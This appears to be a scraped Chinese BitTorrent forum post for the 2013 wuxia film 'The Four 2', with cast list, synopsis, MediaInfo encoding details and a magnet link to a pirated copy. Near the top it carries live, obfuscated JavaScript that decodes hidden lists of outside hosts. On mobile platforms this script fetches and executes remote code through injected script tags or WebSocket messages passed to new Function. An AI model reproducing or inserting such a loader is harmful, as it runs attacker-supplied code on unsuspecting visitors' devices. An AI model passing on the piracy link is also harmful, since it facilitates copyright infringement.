四大名捕2[国粤语配音/中文字幕].The.Four.2.2013.1080p.BluRay.x265.10bit.DTS.2Audio 8.83GB

版主小s 9天前 88

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 四大名捕2 / The Four 2
◎年  代 2013
◎产  地 中国大陆 / 中国香港
◎类  别 动作 / 悬疑 / 奇幻 / 武侠 / 古装
◎语  言 汉语普通话
◎上映日期 2013-12-06(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt3341084/
◎豆瓣评分 5.2/10 (68009人评价)
◎豆瓣链接 https://movie.douban.com/subject/10604892/
◎片  长 118分钟
◎导  演 陈嘉上 Gordon Chan (id:1274245)
       秦小珍 Janet Chun (id:1274236)
◎编  剧 陈嘉上 Gordon Chan (id:1274245)
       陈淑贤 Susan Chan (id:1280439)
       王思敏 Sze Man Wang (id:1324934)
       谭广源 Frankie Tam (id:1328638)
       吕冠南 Koon-Nam Lui (id:1313441)
       温瑞安 Ruian Wen (id:1321279)
◎演  员 邓超 Chao Deng (id:1274235)
       刘亦菲 Yifei Liu (id:1049732)
       邹兆龙 Collin Chou (id:1022821)
       郑中基 Ronald Cheng (id:1032940)
       黄秋生 Anthony Wong Chau-Sang (id:1050076)
       江一燕 Yiyan Jiang (id:1274286)
       成泰燊 Taishen Cheng (id:1196361)
       柳岩 Yan Liu (id:1312846)
       吴秀波 Xiubo Wu (id:1275317)
       邓萃雯 Sheren Tang (id:1160170)
       于承惠 Chenghui Yu (id:1316257)
       包贝尔 Bei'er Bao (id:1315866)
       向恬冉 Tianran Xiang (id:1336304)
       吴映洁 Gemma Wu (id:1313603)
       刘俊纬 A-Wei (id:1316605)
       李子雄 Waise Lee (id:1037662)
       张兆辉 Siu-Fai Cheung (id:1005843)
       周海媚 Kathy Chow (id:1037908)
       卢惠光 Ken Lo (id:1032633)
       苗驰 Chi Miao (id:1327729)
       曹炳琨 Bingkun Cao (id:1313383)
       高天 Tian Gao (id:1318120)
       刘子威 Ziwei Liu (id:1358467)
       蒋浚赫 Junhe Jiang (id:1390452)
       刘峰超 Fengchao Liu (id:1332806)
       李紫菻 Zilin Li (id:1390449)
       李欣烨 Xinye Li (id:1356952)
       邱晔 Angela Qiu (id:1331015)
       李宛真 Yuki Li (id:1351244)
       张煜雯 Yuwen Zhang (id:1327150)
       许建 Jian Xu (id:1359626)
       李立宏 Lihong Li (id:1320458)
       黄泰来 Taylor Wong (id:1322476)
       丁丁张 Dingding Zhang (id:1390462)
       缪健辉 Tony Miu (id:1378532)
       杨振宇 Zhenyu Yang (id:1424278)
       蔡彦菁 Maggie Choy (id:1426247)
       黄迪 Marina Huang (id:1427970)
       何志辉 Brian Ho (id:1310960)
       陈迪凯 Water Chan Tik-Hoi (id:1345570)
       谷轩昭 Huan-Chiu Ku (id:1289063)

◎标  签 武侠 / 动作 / 刘亦菲 / 国产电影 / 邓超 / 中国 / 吴秀波 / 2013

◎简  介
  多事的追命(郑中基 饰)、铁手(邹兆龙 饰)耍花招,撮合冷血(邓超 饰)、无情(刘亦菲 饰)这对小情人,神侯府上下正其乐融融,空气却传来浓烈的血腥味道,三里之外的城郊老宅,杀人凶案正在发生!                                       
                                    四大名捕前往现场,奋力追凶。                                       
                                    六扇门接获消息,捕神(成泰燊 饰)也带同姬摇花( 江一燕 饰)等前来了解案情,双方合并追查,发现此案与六扇门早前追查的几宗灭门案有牵连。                                       
                                    悬案未决,六扇门却在碑林发现了捕神的尸体,而此前正是诸葛先生(黄秋生 饰)约捕神在碑林见面,一切线索都指向了诸葛先生。为探明真相,诸葛正我回到碑林查看,没想到却碰到了一位绝迹江湖多年的老朋友。双方对峙之时,四大名捕和六扇门也相继赶到,再生枝节。六扇门将诸葛先生和无情收押天牢。                                       
                                    四大名捕群龙无首,名存实亡。此时,王爷(李子雄 饰)忽访天牢,奉皇上旨意要即刻治无情死罪。铁血大牢之内,一场权力、仇恨、爱...

◎获奖情况 (共2项)
  第4届豆瓣电影鑫像奖 (2014)
  豆渣单元 最渣影片(华语)(提名)
  豆渣单元 最渣导演(华语)(提名)
   └──陈嘉上 (id:1274245)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 286913261837583776444902602349697411539 (0xD7D97BF73FEFC4528F8A3A18A095A9D3)

  4. Complete name                            : [email protected]COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 8.83 GiB

  8. Duration                                 : 1 h 57 min

  9. Overall bit rate                         : 10.8 Mb/s

  10. Movie name                               : The Four 2 2013

  11. Encoded date                             : UTC 2021-10-07 01:36:09

  12. Writing application                      : mkvmerge v57.0.0 ('Till The End') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 57 min

  23. Bit rate                                 : 7 743 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 804 pixels

  26. Display aspect ratio                     : 2.40:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.209

  33. Stream size                              : 6.33 GiB (72%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=19.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio #1

  39. ID                                       : 2

  40. Format                                   : DTS

  41. Format/Info                              : Digital Theater Systems

  42. Codec ID                                 : A_DTS

  43. Duration                                 : 1 h 57 min

  44. Bit rate mode                            : Constant

  45. Bit rate                                 : 1 509 kb/s

  46. Channel(s)                               : 6 channels

  47. Channel layout                           : C L R Ls Rs LFE

  48. Sampling rate                            : 48.0 kHz

  49. Frame rate                               : 93.750 FPS (512 SPF)

  50. Bit depth                                : 16 bits

  51. Compression mode                         : Lossy

  52. Stream size                              : 1.23 GiB (14%)

  53. Title                                    : Cantonese

  54. Language                                 : Chinese

  55. Default                                  : Yes

  56. Forced                                   : No


  57. Audio #2

  58. ID                                       : 3

  59. Format                                   : DTS

  60. Format/Info                              : Digital Theater Systems

  61. Codec ID                                 : A_DTS

  62. Duration                                 : 1 h 57 min

  63. Bit rate mode                            : Constant

  64. Bit rate                                 : 1 509 kb/s

  65. Channel(s)                               : 6 channels

  66. Channel layout                           : C L R Ls Rs LFE

  67. Sampling rate                            : 48.0 kHz

  68. Frame rate                               : 93.750 FPS (512 SPF)

  69. Bit depth                                : 16 bits

  70. Compression mode                         : Lossy

  71. Stream size                              : 1.23 GiB (14%)

  72. Title                                    : Mandarin

  73. Language                                 : Chinese

  74. Default                                  : No

  75. Forced                                   : No


  76. Text #1

  77. ID                                       : 4

  78. ID in the original source medium         : 4609 (0x1201)

  79. Format                                   : PGS

  80. Muxing mode                              : zlib

  81. Codec ID                                 : S_HDMV/PGS

  82. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration                                 : 1 h 50 min

  84. Bit rate                                 : 21.0 kb/s

  85. Count of elements                        : 2424

  86. Stream size                              : 16.7 MiB (0%)

  87. Title                                    : chs

  88. Language                                 : Chinese

  89. Default                                  : Yes

  90. Forced                                   : No

  91. Original source medium                   : Blu-ray


  92. Text #2

  93. ID                                       : 5

  94. ID in the original source medium         : 4608 (0x1200)

  95. Format                                   : PGS

  96. Muxing mode                              : zlib

  97. Codec ID                                 : S_HDMV/PGS

  98. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration                                 : 1 h 50 min

  100. Bit rate                                 : 21.1 kb/s

  101. Count of elements                        : 2424

  102. Stream size                              : 16.7 MiB (0%)

  103. Title                                    : cht

  104. Language                                 : Chinese

  105. Default                                  : No

  106. Forced                                   : No

  107. Original source medium                   : Blu-ray


  108. Text #3

  109. ID                                       : 6

  110. ID in the original source medium         : 4610 (0x1202)

  111. Format                                   : PGS

  112. Muxing mode                              : zlib

  113. Codec ID                                 : S_HDMV/PGS

  114. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration                                 : 1 h 50 min

  116. Bit rate                                 : 27.0 kb/s

  117. Count of elements                        : 2430

  118. Stream size                              : 21.4 MiB (0%)

  119. Language                                 : English

  120. Default                                  : No

  121. Forced                                   : No

  122. Original source medium                   : Blu-ray


  123. Menu

  124. 00:00:00.000                             : Chapter 01

  125. 00:10:17.283                             : Chapter 02

  126. 00:18:41.078                             : Chapter 03

  127. 00:28:26.037                             : Chapter 04

  128. 00:38:27.888                             : Chapter 05

  129. 00:48:20.063                             : Chapter 06

  130. 00:59:01.120                             : Chapter 07

  131. 01:07:58.824                             : Chapter 08

  132. 01:17:41.073                             : Chapter 09

  133. 01:27:06.888                             : Chapter 10

  134. 01:36:38.918                             : Chapter 11

  135. 01:44:17.251                             : Chapter 12


TAGS 武侠 动作 奇幻 悬疑 古装

磁力链:
  • magnet:?xt=urn:btih:6042034CF25A352D90D51BF792BCC3A94DF60E25
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回